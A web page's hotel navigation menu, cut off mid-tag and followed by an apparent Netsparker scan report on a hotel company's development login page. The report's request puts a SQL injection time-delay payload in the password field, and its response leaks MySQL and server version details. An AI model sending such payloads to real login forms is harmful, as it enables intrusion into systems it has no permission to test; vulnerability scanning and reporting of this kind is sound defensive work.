<li class="menuparent"><a href="/hotels/hotels.aspx"><img src="/images-nav/navtop-hote-off.png" alt="Hotels" name="Hotels" width="52" height="38" border="0" id="Hotels" onmouseover='this.src="/images-nav/navtop-hote-on.png"' onmouseout='this.src="/images-nav/navtop-hote-off.png"' /></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels.aspx">All Hotels<img src="/assets/clear.gif" width="15" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/locations.aspx">Cities<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/hotels-alexandria.aspx">Alexandria<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-arlington.aspx">Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-aspen.aspx">Aspen<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-atlanta.aspx">Atlanta<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-baltimore.aspx">Baltimore<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-boston.aspx">Boston/Cambridge<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-chicago.aspx">Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-dallas.aspx">Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-denver.aspx">Denver<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-losangeles.aspx">Los Angeles<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-miami.aspx">Miami<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-newyorkcity.aspx">New York City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-philadelphia.aspx">Philadelphia<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-portland.aspx">Portland<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-saltlakecity.aspx">Salt Lake City<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sandiego.aspx">San Diego<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanfrancisco.aspx">San Francisco<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-scottsdale.aspx">Scottsdale<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-seattle.aspx">Seattle<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-sanjose.aspx">Silicon Valley/Cupertino<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<!--<li class="menuparent"><a href="/hotels/hotels-vancouver.aspx">Vancouver, B.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>-->
<li class="menuparent"><a href="/hotels/hotels-verobeach.aspx">Vero Beach<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/hotels-washingtondc.aspx">Washington, D.C.<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
</ul>
</li>
<li class="menuparent"><a href="/hotels/hotel-palomars.aspx">Hotel Palomar<img src="/images-nav/arrow.gif" width="10" height="7" border="0"></a>
<ul id="secondary-nav">
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-arlington/">Hotel Palomar Arlington<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-atlanta-midtown/">Hotel Palomar Atlanta-Midtown<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-chicago/">Hotel Palomar Chicago<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-dallas/">Hotel Palomar Dallas<img src="/assets/clear.gif" width="10" height="1" border="0"></a></li>
<li class="menuparent"><a href="/hotels/factsheets/hotel-palomar-los-angeles-westwood/">Hotel Palomar LA-Westwood<img src="/asset..
Database Error Message

Database Error Message

1 TOTAL
INFORMATION
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /development/login.aspx

/development/login.aspx

http://www.kimptonhotels.com/development/login.aspx

Parameters

Parameter Type Value
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq
__VIEWSTATE POST /wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=
pword POST ';WAITFOR DELAY '0:0:25'--
submitbutton POST Login
uname POST Ronald Smith

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=izxqi2md55dl3345s43dcm55; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 274
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword=%27;WAITFOR%20DELAY%20%270:0:25%27--&submitbutton=Login&uname=Ronald+Smith

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:22:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4582



<!-- %@ import Namespace="MySql.Data.MySqlClient" % -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">



<html>

<head>

<title>Kimpton Standards Login</title>

<link rel="stylesheet" type="text/css" href="../_css/global.css">
<style type="text/css">
<!--

body {
background: #FFFFFF;
}

-->
</style>
</head>



<body>

<form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="ctl00">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['ctl00'];
if (!theForm) {
theForm = document.ctl00;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=-b7UqH0vtZuZGPZs3YNpmA2&amp;t=633925424339517500" type="text/javascript"></script>


<script src="/WebResource.axd?d=JFcpFU90xutwtLPW0qJGJ5vfTzBDcTMPuZSy1P53lIE1&amp;t=633925424339517500" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq" />
</div>

<table border="0" width="600" valign="top" class="kim11">

<tr>

<td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br />

<p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td>



</tr>
<tr>
<td colspan="2"><br />We could not process your request.<br />ERROR [42000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WAITFOR DELAY '0:0:25'--' LIMIT 0, 1' at line 1</td>
</tr>

<tr>

<td width="100">
<p style="margin: 10px 0 0 6px;">
<strong>Username</strong>
<span id="runame" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="uname" type="text" value="Ronald Smith" id="uname" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr valign="top">

<td width="100">
<p style="margin: 0 0 0 6px;">
<strong>Password</strong>
<span id="rpword" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="pword" type="text" value="';WAITFOR DELAY '0:0:25'--" id="pword" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr>

<td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;submitbutton&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="submitbutton" /></td>

</tr>

</table>


<script type="text/javascript">
//<![CDATA[
var Page_Validators = new Array(document.getElementById("runame"), document.getElementById("rpword"));
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
var runame = document.all ? document.all["runame"] : document.getElementById("runame");
runame.controltovalidate = "uname";
runame.errormessage = "Required";
runame.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
runame.initialvalue = "";
var rpword = document.all ? document.all["rpword"] : document.getElementById("rpword");
rpword.controltovalidate = "pword";
rpword.errormessage = "Required";
rpword.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
rpword.initialvalue = "";
//]]>
</script>


<script type="text/javascript">
//<![CDATA[

var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return ValidatorCommonOnSubmit();
}
else {
return true;
}
}
//]]>
</script>
</form>

</body>

</html>